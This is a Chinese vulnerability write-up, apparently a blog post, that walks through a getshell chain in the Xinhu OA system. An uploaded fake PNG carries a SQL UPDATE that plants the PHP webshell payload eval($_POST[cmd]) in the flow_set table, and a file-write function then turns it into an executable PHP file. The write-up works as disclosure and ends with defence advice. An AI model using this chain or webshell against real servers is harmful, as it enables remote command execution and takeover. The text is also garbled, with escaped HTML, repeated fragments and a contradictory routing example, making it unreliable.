从文件写入SQL语句到Getshell漏洞分析与利用<\/h1>

环境搭建<\/h2>

源码下载地址: https:\/\/github.com\/rainrocka\/xinhu<\/li>
下载后解压到本地网站根目录下<\/li>
配置好数据库并安装<\/li>

默认密码: admin\/123456 (登录后需更改密码)<\/li> <\/ol>

路由分析<\/h2>

使用GET方式接收参数: m, d, a, ajaxbool<\/li>
rock->jm->gettoken<\/code> 获取令牌<\/li>
当 ajaxbool=false<\/code> 时访问 xxxAction.php<\/code><\/li>

当 ajaxbool=true<\/code> 时访问 xxxAjax.php<\/code><\/li>
<\/ul>
参数说明:<\/p>

a<\/code>: PHP文件名(不含Action)<\/li>
d<\/code>: 动作名(action)<\/li>
m<\/code>: 目录名(webadmin下的子目录)<\/li>
默认值: a=index, d=default, m=空字符串<\/li>
<\/ul>
示例:

index.php?a=deluser&m=imgroup&ajaxbool=true&gid=38&sid=1<\/code><\/p>

m=user<\/code>: 请求webadmin下的imgroup目录<\/li>
a=list<\/code>: 请求的方法是deluser<\/li>
ajaxbool=true<\/code>: 这是一个AJAX请求<\/li>
<\/ul>
漏洞分析<\/h2>
文件写入点<\/h3>
文件路径: webmain\/main\/flow\/flowAction.php<\/code><\/p>
createtxt<\/code>函数是一个文件写入方法，关键代码如下:<\/p>
function<\/span> createtxt<\/span>($modenum, $str){
<\/span><\/span>    $path =<\/span> ''<\/span>.<\/span>P<\/span>.<\/span>'\/mode_'<\/span>.<\/span>$modenum.<\/span>'Action.php'<\/span>;
<\/span><\/span>    $bo =<\/span> file_put_contents<\/span>($path, $str);
<\/span><\/span>    return<\/span> $bo;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点:<\/p>

如果能控制$modenum<\/code>或$rs['name']<\/code>的内容就可以实现Getshell<\/li>
$modenum<\/code>同时控制了文件名，所以只能通过控制$rs['name']<\/code>来Getshell<\/li>
<\/ul>
数据来源分析<\/h3>
$rs<\/code>数组是从flow_set<\/code>数据库表获取的。如果能控制name<\/code>字段，并注释掉前后内容，就能写入恶意代码。<\/p>
寻找SQL注入点<\/h3>
在webmain\/system\/beifen\/beifenAction.php<\/code>文件中的huifdatanewAjax<\/code>方法存在SQL查询漏洞:<\/p>
function<\/span> huifdatanewAjax<\/span>()
<\/span><\/span>{
<\/span><\/span>    $sid =<\/span> $this-><\/span>rock<\/span>-><\/span>post<\/span>('sid'<\/span>);
<\/span><\/span>    $folder =<\/span> $this-><\/span>rock<\/span>-><\/span>post<\/span>('folder'<\/span>);
<\/span><\/span>    $data =<\/span> c<\/span>('xinhu'<\/span>)-><\/span>getbackdata<\/span>($folder, $sid);
<\/span><\/span>    $tables =<\/span> $this-><\/span>db<\/span>-><\/span>gettables<\/span>();
<\/span><\/span>    foreach<\/span>($data as<\/span> $tab=><\/span>$dataarr){
<\/span><\/span>        if<\/span>(!<\/span>in_array<\/span>($tab, $tables))continue<\/span>;
<\/span><\/span>        $createsql =<\/span> $dataarr['createsql'<\/span>];
<\/span><\/span>        $this-><\/span>db<\/span>-><\/span>query<\/span>($createsql);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用条件:<\/p>

sid<\/code>可控且不在数据库表名中<\/li>
可以控制文件内容<\/li>
目录folder<\/code>也可控<\/li>
<\/ol>
文件上传点<\/h3>
在webmain\/flow\/flowopt\/flowoptAction.php<\/code>文件中的savetopdfAjax<\/code>方法:<\/p>

根据imgbase64<\/code>上传一个abc.png<\/code>文件<\/li>
上传PDF文件(默认无此插件会报错，但不影响png上传)<\/li>
<\/ol>
上传的文件位置: upload\/logs\/2025-03\/abc.png<\/code><\/p>
漏洞复现流程<\/h2>

使用savetopdfAjax<\/code>上传包含恶意SQL语句的图片<\/li>
请求接口触发图片内容中的恶意SQL语句<\/li>
更新数据表中带有payload的name<\/code>值<\/li>
触发php文件写入，实现Getshell<\/li>
<\/ol>
详细步骤<\/h3>


上传恶意图片<\/strong>:<\/p>

构造POC文件内容为:
<?<\/span>php<\/span>
<\/span><\/span>return<\/span> array<\/span>(
<\/span><\/span>    'flow_set'<\/span> =><\/span> array<\/span>(
<\/span><\/span>        'createsql'<\/span> =><\/span> "UPDATE flow_set SET name='<?php eval(<\/span>$_POST[cmd]<\/span>);?>' WHERE id=1"<\/span>
<\/span><\/span>    )
<\/span><\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre><\/li>
通过savetopdfAjax<\/code>方法上传为abc.png<\/code><\/li>
<\/ul>
<\/li>

触发SQL执行<\/strong>:<\/p>

访问huifdatanewAjax<\/code>接口，指定sid=abc.png<\/code>和正确的folder<\/code>参数<\/li>
这将执行图片中的SQL语句，更新flow_set<\/code>表中的name<\/code>字段<\/li>
<\/ul>
<\/li>

触发PHP文件写入<\/strong>:<\/p>

访问createtxt<\/code>相关功能，生成mode_zzf08rneAction.php<\/code>文件<\/li>
文件内容将包含恶意代码<\/li>
<\/ul>
<\/li>

命令执行<\/strong>:<\/p>

访问生成的PHP文件，通过POST参数cmd<\/code>执行任意命令<\/li>
<\/ul>
<\/li>
<\/ol>
防御建议<\/h2>

对文件上传内容进行严格过滤<\/li>
对SQL查询参数进行预编译处理<\/li>
限制数据库操作权限<\/li>
对写入PHP文件的内容进行安全检查<\/li>
禁用危险函数如eval()<\/code><\/li>
<\/ol>

从文件写入SQL语句到Getshell漏洞分析与利用<\/h1>

漏洞分析<\/h2>

数据来源分析<\/h3>
`$rs<\/code>数组是从flow_set<\/code>数据库表获取的。如果能控制name<\/code>字段，并注释掉前后内容，就能写入恶意代码。<\/p>`

防御建议<\/h2>

对文件上传内容进行严格过滤<\/li>
对SQL查询参数进行预编译处理<\/li>
限制数据库操作权限<\/li>
对写入PHP文件的内容进行安全检查<\/li>
禁用危险函数如`eval()<\/code><\/li> <\/ol>`

从文件写入SQL语句到Getshell漏洞分析与利用<\/h1>

漏洞分析<\/h2>

数据来源分析<\/h3> $rs<\/code>数组是从flow_set<\/code>数据库表获取的。如果能控制name<\/code>字段，并注释掉前后内容，就能写入恶意代码。<\/p>

防御建议<\/h2> 对文件上传内容进行严格过滤<\/li> 对SQL查询参数进行预编译处理<\/li> 限制数据库操作权限<\/li> 对写入PHP文件的内容进行安全检查<\/li> 禁用危险函数如eval()<\/code><\/li> <\/ol>

数据来源分析<\/h3>
`$rs<\/code>数组是从flow_set<\/code>数据库表获取的。如果能控制name<\/code>字段，并注释掉前后内容，就能写入恶意代码。<\/p>`

防御建议<\/h2>

对文件上传内容进行严格过滤<\/li>
对SQL查询参数进行预编译处理<\/li>
限制数据库操作权限<\/li>
对写入PHP文件的内容进行安全检查<\/li>
禁用危险函数如`eval()<\/code><\/li> <\/ol>`